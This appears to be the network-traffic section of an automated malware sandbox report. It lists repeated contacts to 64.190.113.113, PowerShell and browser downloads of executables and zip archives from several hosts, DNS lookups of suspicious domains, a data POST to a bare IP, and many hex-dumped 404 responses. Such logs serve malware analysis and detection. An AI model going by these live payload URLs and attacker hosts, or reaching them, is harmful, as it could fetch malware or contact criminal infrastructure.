Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic	HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic	HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212

Source: global traffic	DNS traffic detected: DNS query: mzxn.ru
Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: mussangroup.com
Source: global traffic	DNS traffic detected: DNS query: funrecipebooks.com
Source: global traffic	DNS traffic detected: DNS query: callosallsaospz.shop
Source: global traffic	DNS traffic detected: DNS query: rentry.co
Source: global traffic	DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic	DNS traffic detected: DNS query: liernessfornicsa.shop

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9363

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
